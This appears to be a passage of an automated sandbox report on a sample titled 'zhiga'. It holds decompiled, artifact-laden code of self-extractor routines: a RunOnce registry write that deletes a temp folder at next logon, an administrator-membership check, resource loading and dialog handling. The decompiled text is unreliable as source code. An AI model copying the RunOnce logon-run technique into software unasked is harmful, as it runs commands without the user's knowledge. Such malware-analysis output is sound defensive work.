                                                          • Instruction Fuzzy Hash: 6441BFB0A01128ABDF259A649CA5AFE7BBCEB55700F0040E9F5C9D7104CB758E81ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E01092267() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v836;
                                                          				void* _v840;
                                                          				int _v844;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				intOrPtr _t33;
                                                          				void* _t38;
                                                          				intOrPtr* _t42;
                                                          				void* _t45;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				signed int _t51;
                                                          
                                                          				_t19 =  *0x1098004; // 0x8a9c601
                                                          				_t20 = _t19 ^ _t51;
                                                          				_v8 = _t19 ^ _t51;
                                                          				if( *0x1098530 != 0) {
                                                          					_push(_t49);
                                                          					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                          						_push(_t38);
                                                          						_v844 = 0x238;
                                                          						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                          							_push(_t47);
                                                          							memset( &_v268, 0, 0x104);
                                                          							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          								E0109658A( &_v268, 0x104, 0x1091140);
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          							E0109171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                          							_t42 =  &_v836;
                                                          							_t45 = _t42 + 1;
                                                          							_pop(_t47);
                                                          							do {
                                                          								_t33 =  *_t42;
                                                          								_t42 = _t42 + 1;
                                                          							} while (_t33 != 0);
                                                          							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                          						}
                                                          						_t20 = RegCloseKey(_v840);
                                                          						_pop(_t38);
                                                          					}
                                                          					_pop(_t49);
                                                          				}
                                                          				return E01096CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                          			}

                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010922A3
                                                          • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 010922D8
                                                          • memset.MSVCRT ref: 010922F5
                                                          • GetSystemDirectoryA.KERNEL32 ref: 01092305
                                                          • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0109236E
                                                          • RegCloseKey.ADVAPI32(?), ref: 0109237A
                                                          Strings
                                                          • wextract_cleanup1, xrefs: 0109227C, 010922CD, 01092363
                                                          • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0109232D
                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01092299
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01092321
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                          • API String ID: 3027380567-1226499438
                                                          • Opcode ID: 366f73fca01500649c3cabf941a0f4d39777a8601195aa126cdd65873d70e6da
                                                          • Instruction ID: 4abd9eeee0fb61aa230870ec496d27dde95f4e84f3e9659127ec265462b9a332
                                                          • Opcode Fuzzy Hash: 366f73fca01500649c3cabf941a0f4d39777a8601195aa126cdd65873d70e6da
                                                          • Instruction Fuzzy Hash: 0531D471A00218BBDF719A65DC59FEA7B7CEB55740F0040EAB58DEA100EA71AB88DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E01093100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				void* _t15;
                                                          				struct HWND__* _t16;
                                                          				struct HWND__* _t33;
                                                          				struct HWND__* _t34;
                                                          
                                                          				_t8 = _a8 - 0xf;
                                                          				if(_t8 == 0) {
                                                          					if( *0x1098590 == 0) {
                                                          						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                          						 *0x1098590 = 1;
                                                          					}
                                                          					L13:
                                                          					return 0;
                                                          				}
                                                          				_t11 = _t8 - 1;
                                                          				if(_t11 == 0) {
                                                          					L7:
                                                          					_push(0);
                                                          					L8:
                                                          					EndDialog(_a4, ??);
                                                          					L9:
                                                          					return 1;
                                                          				}
                                                          				_t15 = _t11 - 0x100;
                                                          				if(_t15 == 0) {
                                                          					_t16 = GetDesktopWindow();
                                                          					_t33 = _a4;
                                                          					E010943D0(_t33, _t16);
                                                          					SetDlgItemTextA(_t33, 0x834,  *0x1098d4c);
                                                          					SetWindowTextA(_t33, "zhiga");
                                                          					SetForegroundWindow(_t33);
                                                          					_t34 = GetDlgItem(_t33, 0x834);
                                                          					 *0x10988b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                          					SetWindowLongA(_t34, 0xfffffffc, E010930C0);
                                                          					return 1;
                                                          				}
                                                          				if(_t15 != 1) {
                                                          					goto L13;
                                                          				}
                                                          				if(_a12 != 6) {
                                                          					if(_a12 != 7) {
                                                          						goto L9;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				_push(1);
                                                          				goto L8;
                                                          			}










                                                          APIs
                                                          • EndDialog.USER32(?,00000000), ref: 0109313B
                                                          • GetDesktopWindow.USER32 ref: 0109314B
                                                          • SetDlgItemTextA.USER32(?,00000834), ref: 0109316A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 01093176
                                                          • SetForegroundWindow.USER32(?), ref: 0109317D
                                                          • GetDlgItem.USER32(?,00000834), ref: 01093185
                                                          • GetWindowLongA.USER32(00000000,000000FC), ref: 01093190
                                                          • SetWindowLongA.USER32(00000000,000000FC,010930C0), ref: 010931A3
                                                          • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010931CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                          • String ID: zhiga
                                                          • API String ID: 3785188418-3705506974
                                                          • Opcode ID: 2d1496c58ec6c3f956cb86beb89a3ee71ce1b1e2f15a2b7fd64b9722a52b8714
                                                          • Instruction ID: e1697d3895e6d2b9e0a05c61576a794e18c6062ede8088f7bfc9fafadd95cdaf
                                                          • Opcode Fuzzy Hash: 2d1496c58ec6c3f956cb86beb89a3ee71ce1b1e2f15a2b7fd64b9722a52b8714
                                                          • Instruction Fuzzy Hash: 0F11E4B1208221FBDF315F389C2CB5A3AB4FB4A720F004211F9E1DA1E4D77A8141EB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E010918A3(void* __edx, void* __esi) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				char _v20;
                                                          				long _v24;
                                                          				void* _v28;
                                                          				void* _v32;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				signed int _t23;
                                                          				long _t45;
                                                          				void* _t49;
                                                          				int _t50;
                                                          				void* _t52;
                                                          				signed int _t53;
                                                          
                                                          				_t51 = __esi;
                                                          				_t49 = __edx;
                                                          				_t23 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t23 ^ _t53;
                                                          				_t25 =  *0x1098128; // 0x2
                                                          				_t45 = 0;
                                                          				_v12 = 0x500;
                                                          				_t50 = 2;
                                                          				_v16.Value = 0;
                                                          				_v20 = 0;
                                                          				if(_t25 != _t50) {
                                                          					L20:
                                                          					return E01096CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                          				}
                                                          				if(E010917EE( &_v20) != 0) {
                                                          					_t25 = _v20;
                                                          					if(_v20 != 0) {
                                                          						 *0x1098128 = 1;
                                                          					}
                                                          					goto L20;
                                                          				}
                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                          					goto L20;
                                                          				}
                                                          				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                          					L17:
                                                          					CloseHandle(_v28);
                                                          					_t25 = _v20;
                                                          					goto L20;
                                                          				} else {
                                                          					_push(__esi);
                                                          					_t52 = LocalAlloc(0, _v24);
                                                          					if(_t52 == 0) {
                                                          						L16:
                                                          						_pop(_t51);
                                                          						goto L17;
                                                          					}
                                                          					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                          						L15:
                                                          						LocalFree(_t52);
                                                          						goto L16;
                                                          					} else {
                                                          						if( *_t52 <= 0) {
                                                          							L14:
                                                          							FreeSid(_v32);
                                                          							goto L15;
                                                          						}
                                                          						_t15 = _t52 + 4; // 0x4
                                                          						_t50 = _t15;
                                                          						while(EqualSid( *_t50, _v32) == 0) {
                                                          							_t45 = _t45 + 1;
                                                          							_t50 = _t50 + 8;
                                                          							if(_t45 <  *_t52) {
                                                          								continue;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						 *0x1098128 = 1;
                                                          						_v20 = 1;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 010917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010918DD), ref: 0109181A
                                                            • Part of subcall function 010917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0109182C
                                                            • Part of subcall function 010917EE: AllocateAndInitializeSid.ADVAPI32(010918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010918DD), ref: 01091855
                                                            • Part of subcall function 010917EE: FreeSid.ADVAPI32(?,?,?,?,010918DD), ref: 01091883
                                                            • Part of subcall function 010917EE: FreeLibrary.KERNEL32(00000000,?,?,?,010918DD), ref: 0109188A
                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010918EB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 010918F2
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0109190A
                                                          • GetLastError.KERNEL32 ref: 01091918
                                                          • LocalAlloc.KERNEL32(00000000,?,?), ref: 0109192C
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 01091944
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01091964
                                                          • EqualSid.ADVAPI32(00000004,?), ref: 0109197A
                                                          • FreeSid.ADVAPI32(?), ref: 0109199C
                                                          • LocalFree.KERNEL32(00000000), ref: 010919A3
                                                          • CloseHandle.KERNEL32(?), ref: 010919AD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 2168512254-0
                                                          • Opcode ID: ed49103aabe69f881496f433c60f48381fd3ecb375ac60ee39cb4303919eb559
                                                          • Instruction ID: 5787e26ae16e92a58864cf78317e60e3c605285875b1cd8b928698d50700a382
                                                          • Opcode Fuzzy Hash: ed49103aabe69f881496f433c60f48381fd3ecb375ac60ee39cb4303919eb559
                                                          • Instruction Fuzzy Hash: AD314871B0020AEBDF209FA9DCA8AAFBBBCFF45320B104469F685D2144D7369904DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E0109468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                          				long _t4;
                                                          				void* _t11;
                                                          				CHAR* _t14;
                                                          				void* _t15;
                                                          				long _t16;
                                                          
                                                          				_t14 = __ecx;
                                                          				_t11 = __edx;
                                                          				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                          				_t16 = _t4;
                                                          				if(_t16 <= _a4 && _t11 != 0) {
                                                          					if(_t16 == 0) {
                                                          						L5:
                                                          						return 0;
                                                          					}
                                                          					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                          					FreeResource(_t15);
                                                          					return _t16;
                                                          				}
                                                          				return _t4;
                                                          			}









                                                          APIs
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                          • LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                          • LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                          • memcpy_s.MSVCRT ref: 010946E5
                                                          • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                          • String ID: TITLE$zhiga
                                                          • API String ID: 3370778649-3314309
                                                          • Opcode ID: 3f11eb1c4126bdf7246ab7979a009be430b2e013b224ffe52bbc22f07f17ff26
                                                          • Instruction ID: 3ed2804da25d43a7191802758943849b8310e7fdd4c1a9b2bc8c9b65d39f65fc
                                                          • Opcode Fuzzy Hash: 3f11eb1c4126bdf7246ab7979a009be430b2e013b224ffe52bbc22f07f17ff26
                                                          • Instruction Fuzzy Hash: 1C01D672344210FBE73016A96D1DF2B3E6CEBC9B61F040054FBC9C7144C966884593E2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E010917EE(intOrPtr* __ecx) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				void* _v24;
                                                          				intOrPtr* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t14;
                                                          				_Unknown_base(*)()* _t20;
                                                          				long _t28;
                                                          				void* _t35;
                                                          				struct HINSTANCE__* _t36;
                                                          				signed int _t38;
                                                          				intOrPtr* _t39;
                                                          
                                                          				_t14 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t14 ^ _t38;
                                                          				_v12 = 0x500;
                                                          				_t37 = __ecx;
                                                          				_v16.Value = 0;
                                                          				_v28 = __ecx;
                                                          				_t28 = 0;
                                                          				_t36 = LoadLibraryA("advapi32.dll");
                                                          				if(_t36 != 0) {
                                                          					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                          					_v20 = _t20;
                                                          					if(_t20 != 0) {
                                                          						 *_t37 = 0;
                                                          						_t28 = 1;
                                                          						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                          							_t37 = _t39;
                                                          							 *0x109a288(0, _v24, _v28);
                                                          							_v20();
                                                          							if(_t39 != _t39) {
                                                          								asm("int 0x29");
                                                          							}
                                                          							FreeSid(_v24);
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t36);
                                                          				}
                                                          				return E01096CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                          			}




















                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010918DD), ref: 0109181A
                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0109182C
                                                          • AllocateAndInitializeSid.ADVAPI32(010918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010918DD), ref: 01091855
                                                          • FreeSid.ADVAPI32(?,?,?,?,010918DD), ref: 01091883
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,010918DD), ref: 0109188A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 4204503880-1888249752
                                                          • Opcode ID: 9e1e01799e5408b81c36ecbf9465fa33ab96c7616a411c45f9072f3d2c89abf2
                                                          • Instruction ID: bf718ba98bf00be11c8c1b436632ece16fee329975b3f8990ee91f4f0da010c0
                                                          • Opcode Fuzzy Hash: 9e1e01799e5408b81c36ecbf9465fa33ab96c7616a411c45f9072f3d2c89abf2
                                                          • Instruction Fuzzy Hash: 5A119371F0020AEBDB109FA4DC59ABFBBB8FF84710F1005A9FA51E7280DA359D009B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01093450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t7;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				int _t22;
                                                          				struct HWND__* _t24;
                                                          
                                                          				_t7 = _a8 - 0x10;
                                                          				if(_t7 == 0) {
                                                          					EndDialog(_a4, 2);
                                                          					L11:
                                                          					return 1;
                                                          				}
                                                          				_t11 = _t7 - 0x100;
                                                          				if(_t11 == 0) {
                                                          					_t12 = GetDesktopWindow();
                                                          					_t24 = _a4;
                                                          					E010943D0(_t24, _t12);
                                                          					SetWindowTextA(_t24, "zhiga");
                                                          					SetDlgItemTextA(_t24, 0x838,  *0x1099404);
                                                          					SetForegroundWindow(_t24);
                                                          					goto L11;
                                                          				}
                                                          				if(_t11 == 1) {
                                                          					_t22 = _a12;
                                                          					if(_t22 < 6) {
                                                          						goto L11;
                                                          					}
                                                          					if(_t22 <= 7) {
                                                          						L8:
                                                          						EndDialog(_a4, _t22);
                                                          						return 1;
                                                          					}
                                                          					if(_t22 != 0x839) {
                                                          						goto L11;
                                                          					}
                                                          					 *0x10991dc = 1;
                                                          					goto L8;
                                                          				}
                                                          				return 0;
                                                          			}









                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 01093490
                                                          • GetDesktopWindow.USER32 ref: 0109349A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010934B2
                                                          • SetDlgItemTextA.USER32(?,00000838), ref: 010934C4
                                                          • SetForegroundWindow.USER32(?), ref: 010934CB
                                                          • EndDialog.USER32(?,00000002), ref: 010934D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$DialogText$DesktopForegroundItem
                                                          • String ID: zhiga
                                                          • API String ID: 852535152-3705506974
                                                          • Opcode ID: c0b95ebff9a1eaa40981d0ca56fc0e7ec2e7c8d0113b0dc05a6a2609ed628b7f
                                                          • Instruction ID: 281337913b2ebb06e049defe3b4ee487157e955c01406e7d7d5ffad90b028548
                                                          • Opcode Fuzzy Hash: c0b95ebff9a1eaa40981d0ca56fc0e7ec2e7c8d0113b0dc05a6a2609ed628b7f
                                                          • Instruction Fuzzy Hash: 9F019279340114ABDB265F79D83C96D3A64FB09750B024024FAD68A594CE36A941EF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E01092AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				int _t21;
                                                          				char _t32;
                                                          				intOrPtr _t34;
                                                          				char* _t38;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				CHAR* _t52;
                                                          				intOrPtr* _t55;
                                                          				CHAR* _t59;
                                                          				void* _t62;
                                                          				CHAR* _t64;
                                                          				CHAR* _t65;
                                                          				signed int _t66;
                                                          
                                                          				_t60 = __edx;
                                                          				_t16 =  *0x1098004; // 0x8a9c601
                                                          				_t17 = _t16 ^ _t66;
                                                          				_v8 = _t16 ^ _t66;
                                                          				_t65 = _a4;
                                                          				_t44 = __edx;
                                                          				_t64 = __ecx;
                                                          				if( *((char*)(__ecx)) != 0) {
                                                          					GetModuleFileNameA( *0x1099a3c,  &_v268, 0x104);
                                                          					while(1) {
                                                          						_t17 =  *_t64;
                                                          						if(_t17 == 0) {
                                                          							break;
                                                          						}
                                                          						_t21 = IsDBCSLeadByte(_t17);
                                                          						 *_t65 =  *_t64;
                                                          						if(_t21 != 0) {
                                                          							_t65[1] = _t64[1];
                                                          						}
                                                          						if( *_t64 != 0x23) {
                                                          							L19:
                                                          							_t65 = CharNextA(_t65);
                                                          						} else {
                                                          							_t64 = CharNextA(_t64);
                                                          							if(CharUpperA( *_t64) != 0x44) {
                                                          								if(CharUpperA( *_t64) != 0x45) {
                                                          									if( *_t64 == 0x23) {
                                                          										goto L19;
                                                          									}
                                                          								} else {
                                                          									E01091680(_t65, E010917C8(_t44, _t65),  &_v268);
                                                          									_t52 = _t65;
                                                          									_t14 =  &(_t52[1]); // 0x2
                                                          									_t60 = _t14;
                                                          									do {
                                                          										_t32 =  *_t52;
                                                          										_t52 =  &(_t52[1]);
                                                          									} while (_t32 != 0);
                                                          									goto L17;
                                                          								}
                                                          							} else {
                                                          								E010965E8( &_v268);
                                                          								_t55 =  &_v268;
                                                          								_t62 = _t55 + 1;
                                                          								do {
                                                          									_t34 =  *_t55;
                                                          									_t55 = _t55 + 1;
                                                          								} while (_t34 != 0);
                                                          								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                          								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                          									 *_t38 = 0;
                                                          								}
                                                          								E01091680(_t65, E010917C8(_t44, _t65),  &_v268);
                                                          								_t59 = _t65;
                                                          								_t12 =  &(_t59[1]); // 0x2
                                                          								_t60 = _t12;
                                                          								do {
                                                          									_t42 =  *_t59;
                                                          									_t59 =  &(_t59[1]);
                                                          								} while (_t42 != 0);
                                                          								L17:
                                                          								_t65 =  &(_t65[_t52 - _t60]);
                                                          							}
                                                          						}
                                                          						_t64 = CharNextA(_t64);
                                                          					}
                                                          					 *_t65 = _t17;
                                                          				}
                                                          				return E01096CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                          			}























                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 01092AE6
                                                          • IsDBCSLeadByte.KERNEL32(00000000), ref: 01092AF2
                                                          • CharNextA.USER32(?), ref: 01092B12
                                                          • CharUpperA.USER32 ref: 01092B1E
                                                          • CharPrevA.USER32(?,?), ref: 01092B55
                                                          • CharNextA.USER32(?), ref: 01092BD4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                          • String ID:
                                                          • API String ID: 571164536-0
                                                          • Opcode ID: f1ea353f3a3312685601f240b84be1ddea901d70258c5a72ded2fcbb622f533d
                                                          • Instruction ID: cf00678eb0da469cb9b006e70c537b4085f2da7c9efd8e9487753b0d4f57a337
                                                          • Opcode Fuzzy Hash: f1ea353f3a3312685601f240b84be1ddea901d70258c5a72ded2fcbb622f533d
                                                          • Instruction Fuzzy Hash: E7412A74604146AFDF669F38D874AFD7BE9AF56350F1400DAD8C283242DB3A4A46DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E010943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                          				signed int _v8;
                                                          				struct tagRECT _v24;
                                                          				struct tagRECT _v40;
                                                          				struct HWND__* _v44;
                                                          				intOrPtr _v48;
                                                          				int _v52;
                                                          				intOrPtr _v56;
                                                          				int _v60;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				void* _t53;
                                                          				intOrPtr _t56;
                                                          				int _t59;
                                                          				struct HWND__* _t63;
                                                          				struct HWND__* _t67;
                                                          				struct HWND__* _t68;
                                                          				struct HDC__* _t69;
                                                          				int _t72;
                                                          				signed int _t74;
                                                          
                                                          				_t63 = __edx;
                                                          				_t29 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t29 ^ _t74;
                                                          				_t68 = __edx;
                                                          				_v44 = __ecx;
                                                          				GetWindowRect(__ecx,  &_v40);
                                                          				_t53 = _v40.bottom - _v40.top;
                                                          				_v48 = _v40.right - _v40.left;
                                                          				GetWindowRect(_t68,  &_v24);
                                                          				_v56 = _v24.bottom - _v24.top;
                                                          				_t69 = GetDC(_v44);
                                                          				_v52 = GetDeviceCaps(_t69, 8);
                                                          				_v60 = GetDeviceCaps(_t69, 0xa);
                                                          				ReleaseDC(_v44, _t69);
                                                          				_t56 = _v48;
